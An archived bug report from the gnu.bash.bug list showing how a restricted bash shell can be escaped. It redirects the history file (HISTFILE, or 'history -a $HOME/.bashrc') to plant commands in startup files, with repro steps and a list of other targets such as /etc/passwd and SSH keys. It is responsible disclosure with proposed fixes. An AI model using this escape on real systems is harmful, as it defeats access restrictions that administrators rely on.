Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > gnu.bash.bug > #16257
| Path | csiph.com!xmission!news.snarked.org!news.linkpendium.com!news.linkpendium.com!panix!usenet.stanford.edu!not-for-mail |
|---|---|
| From | Diffie <nano@mm.st> |
| Newsgroups | gnu.bash.bug |
| Subject | Potential restricted bash escape by modifying history file |
| Date | Thu, 30 Apr 2020 14:22:31 -0400 |
| Lines | 54 |
| Approved | bug-bash@gnu.org |
| Message-ID | <mailman.1702.1588272528.3066.bug-bash@gnu.org> (permalink) |
| References | <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com> |
| NNTP-Posting-Host | lists.gnu.org |
| Mime-Version | 1.0 |
| Content-Type | text/plain |
| X-Trace | usenet.stanford.edu 1588272529 31388 209.51.188.17 (30 Apr 2020 18:48:49 GMT) |
| X-Complaints-To | action@cs.stanford.edu |
| To | bug-bash@gnu.org |
| Envelope-to | bug-bash@gnu.org |
| DKIM-Signature | v=1; a=rsa-sha256; c=relaxed/relaxed; d=mm.st; h= mime-version:message-id:date:from:to:subject:content-type; s= fm3; bh=852X0AVM9ow0dK8n5qr/JBXkPaeL24Fvym7fmLxdBlg=; b=LkaQ9NLL dxRDgZxMzvu0iwqZhlAWwb0PcyEA212Ne4nC2aDZv6czu6IEc6w+E0BN8z4WE2SN Mihwo1iS7uXp1p9FtoX8KbI++FM9NDFNOSHkSa8g3K9wPZ5qP9KobJfdCCIktmUr prdXhJxOAgE2LrJUem/Z+YF4T07r8sjE8PGgL2EOvr82S7gVwblHH5rGkLRqWldJ ZGaBgiURxvkBrA+tJ8vjKe8OhYUUzfNYxeR4NP8GGejnjvG9bs4Sx2oS60VwW9f6 Xq+QmfOvEVKH7XU5zUBL6ST4WUYSZOXifCOCksqIDjsrMuvSN/XHMzAMeGGrSQQE RuD1RTGOYIXgNQ== |
| DKIM-Signature | v=1; a=rsa-sha256; c=relaxed/relaxed; d= messagingengine.com; h=content-type:date:from:message-id :mime-version:subject:to:x-me-proxy:x-me-proxy:x-me-sender :x-me-sender:x-sasl-enc; s=fm2; bh=852X0AVM9ow0dK8n5qr/JBXkPaeL2 4Fvym7fmLxdBlg=; b=fYZ757KlTK1ZL2B8i24T+MuEl8EkriVa5Acvhq3BkYy2H 89cdd7dypfITl79RNWeQJ/XKpQpIVBVBnBZf6AAK+jLBW4VZNOR3u8HytaZWaixB D/crkLPzJZEwUSDbg878N9zf9uoTz853rNRJG5cLcfwVHah1zcjEudC+4EKL5JbS sDA2ETZqx4TEuy3x6fOB54kLJuVPhB5Y8XdhD/UcjLoi/mSb67mxLivN0QqROktZ bjXtZ+eIQ0eNw3ZLIR9CHxycBz43NNf8qXvVKFmtfaTL0zQWVs9+ooDvbL6CxRkm hEKZ3+cMvU2CbARkUGjPlnW5KkhILgU4vCbVZMvLQ== |
| X-ME-Sender | <xms:iBerXvxQxDO8BfFdKPfVX4ePIZaGR-YjTin3r3a0A56YR8eiFxzrKQ> |
| X-ME-Proxy-Cause | gggruggvucftvghtrhhoucdtuddrgeduhedrieehgdduvdefucetufdoteggodetrfdotf fvucfrrhhofhhilhgvmecuhfgrshhtofgrihhlpdfqfgfvpdfurfetoffkrfgpnffqhgen uceurghilhhouhhtmecufedttdenucenucfjughrpefofgggkfffhffvufgtsegrtderre erredtnecuhfhrohhmpeffihhffhhivgcuoehnrghnohesmhhmrdhstheqnecuggftrfgr thhtvghrnhepffevfeffjeduiedtheduvdehveektefhfeeikeeiieffheetudehgeduge ehveevnecuvehluhhsthgvrhfuihiivgeptdenucfrrghrrghmpehmrghilhhfrhhomhep nhgrnhhosehmmhdrshht |
| X-ME-Proxy | <xmx:iBerXpX_jL1gvmCGio6shHu82TDE94mKqSvvHZHi9E--Q2K2s-LOgg> <xmx:iBerXp1lpgCqoZSLuyAomWXbND_hcIYyzM0Jy1yiBw4vfP7RTvFAZA> <xmx:iBerXuQEDxOJHug5gQIuIlYhr1TRaX268gXTQzZaGI96zbaZGmukfg> <xmx:iBerXg0R1Tt_x603XNzZ6nTI-P9rEcZVepd-fUaXQNlyihctGzvpsA> |
| X-Mailer | MessagingEngine.com Webmail Interface |
| User-Agent | Cyrus-JMAP/3.3.0-dev0-351-g9981f4f-fmstable-20200421v1 |
| Received-SPF | pass client-ip=64.147.123.25; envelope-from=nano@mm.st; helo=wout2-smtp.messagingengine.com |
| X-detected-operating-system | by eggs.gnu.org: First seen = 2020/04/30 14:23:05 |
| X-ACL-Warn | Detected OS = Linux 2.2.x-3.x [generic] [fuzzy] |
| X-Received-From | 64.147.123.25 |
| X-Mailman-Approved-At | Thu, 30 Apr 2020 14:48:47 -0400 |
| X-Content-Filtered-By | Mailman/MimeDel 2.1.23 |
| X-BeenThere | bug-bash@gnu.org |
| X-Mailman-Version | 2.1.23 |
| Precedence | list |
| List-Id | Bug reports for the GNU Bourne Again SHell <bug-bash.gnu.org> |
| List-Unsubscribe | <https://lists.gnu.org/mailman/options/bug-bash>, <mailto:bug-bash-request@gnu.org?subject=unsubscribe> |
| List-Archive | <https://lists.gnu.org/archive/html/bug-bash> |
| List-Post | <mailto:bug-bash@gnu.org> |
| List-Help | <mailto:bug-bash-request@gnu.org?subject=help> |
| List-Subscribe | <https://lists.gnu.org/mailman/listinfo/bug-bash>, <mailto:bug-bash-request@gnu.org?subject=subscribe> |
| X-Mailman-Original-Message-ID | <1254402a-b6ad-4bb8-9831-7830b24c12f0@www.fastmail.com> |
| Xref | csiph.com gnu.bash.bug:16257 |
Show key headers only | View raw
Configuration Information [Automatically generated, do not change]: Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O2 -g -pipe -Wall -Werror=format-security -Wp,-D_FORTIFY_SOURCE=2 -Wp,-D_GLIBCXX_ASSERTIONS -fexceptions -fstack-protector-strong -grecord-gcc-switches -specs=/usr/lib/rpm/redhat/redhat-hardened-cc1 -specs=/usr/lib/rpm/redhat/redhat-annobin-cc1 -m64 -mtune=generic -fasynchronous-unwind-tables -fstack-clash-protection -fcf-protection -Wno-parentheses -Wno-format-security uname output: Linux host 5.5.17-200.fc31.x86_64 #1 SMP Mon Apr 13 15:29:42 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux Machine Type: x86_64-redhat-linux-gnu Bash Version: 5.0 Patch Level: 11 Release Status: release *Description:* It is possible to write/append arbitrary content to files from a restricted bash shell (with the privileges of the current user context) by tweaking the HISTFILE variable, or by specifying a filename to "history -[a][w]". This does not necessarily lead to a restriction bypass in all configurations, but does in a few that come to mind: * If the user can write to their home directory they can append arbitrary code to .bashrc/other shell files. These shell files will execute the code without restrictions on subsequent runs of rbash (assuming rbash is not being run in posix mode, and that --norc is not being passed) * If the user is root they can trivially get an unrestricted shell by modifying /etc/passwd, etc. * If the cwd contains an executable script that the user can write to, they can append to the script with arbitrary code, then invoke this code from rbash: "hash -p executable_script mal_command ; mal_command" (this could be possible with an executable binary too, although would be a little more complex) * SSH authorized keys, various other configs. * etc... Again, it will depend on the configuration, but this seems exploitable in most configurations of rbash (one where it may be more difficult to exploit is when the user is placed into a non-home directory chroot where they have limited write access). *Repeat-By:* [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r [__RESTRICTED] bash-5.0$ export HISTFILE=$HOME/.bashrc [__RESTRICTED] bash-5.0$ history -c [__RESTRICTED] bash-5.0$ /usr/bin/whoami [__RESTRICTED] bash: /usr/bin/whoami: restricted: cannot specify `/' in command names [__RESTRICTED] bash-5.0$ history -a [__RESTRICTED] bash-5.0$ exit [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r diffie # whoami inserted into .bashrc above [__RESTRICTED] bash-5.0$ OR without using HISTFILE variable [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r [__RESTRICTED] bash-5.0$ history -a $HOME/.bashrc ' > /usr/bin/whoami > ' [__RESTRICTED] bash-5.0$ exit [UNRESTRICTED] bash-5.0$ PATH= /bin/bash -r diffie [__RESTRICTED] bash-5.0$ *Fix: * * Disable writing to a specific file in rbash with "history -[a][w] /tmp/bad_file bad_command" and make HISTFILE readonly. May be some other edge cases here. * Disable history in rbash altogether.
Back to gnu.bash.bug | Previous | Next | Find similar
Potential restricted bash escape by modifying history file Diffie <nano@mm.st> - 2020-04-30 14:22 -0400
csiph-web